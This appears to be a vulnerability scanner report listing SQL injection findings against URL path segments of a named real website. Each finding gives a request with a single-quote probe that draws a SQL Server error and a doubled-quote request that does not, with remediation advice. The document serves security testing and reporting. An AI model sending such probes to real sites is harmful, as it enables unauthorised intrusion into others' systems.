The REST URL parameter 12 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 12, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl'/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=ADKAFEIDIKFJGPOLADELFLBE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl''/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=FDKAFEIDNBNPBIGDAAPCDILI; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 13 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 13, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den'/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=KDKAFEIDDHGLEMFAACIJAAON; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den''/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=ODKAFEIDENHAJHNNILKJOJBO; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 14 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 14, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start'/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CEKAFEIDMKACFKECBOHECDHJ; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start''/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=EEKAFEIDGGGDFCEMACNDMFPL; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 15 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 15, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15'/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=KEKAFEIDBHIAPCNEPPBHCBFE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15''/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=OEKAFEIDFHLBJFPAIHPNFKOP; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 16 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 16, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom'/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CFKAFEIDLKECHIFIGBJENHHF; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom''/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=IFKAFEIDGBEIIHGDMIKPFHEM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 17 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 17, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1'/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=MFKAFEIDBFLBBCCNLPAGGIFA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1''/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=AGKAFEIDCALFBBMKIFLAOALF; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 18 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 18, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid'/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=FGKAFEIDBEKECPOOFDMIJGDH; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid''/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=JGKAFEIDEJNHHOPNALJLEILP; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 19 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 19, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:'/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=NGKAFEIDHDCJLBPPLFMDMDHJ; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:''/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=BHKAFEIDONCKPJKPEAEEMIKP; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles'/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23740 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=OMJAFEIDACLINAHCFFAADIDH; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles''/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41842 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=GNJAFEIDEPLENPLELMJFHKGP; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 20 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 20, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh'/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=HHKAFEIDIMHLAENGBBGFAHEF; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh''/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=IHKAFEIDMLGKGHCMCEOMFLDP; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 21 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 21, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106'/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=OHKAFEIDFJOFOHPLIGADAOHI; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106''/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=BIKAFEIDHNKFHDGJGAOGOOKB; path=/ Cache-control: private
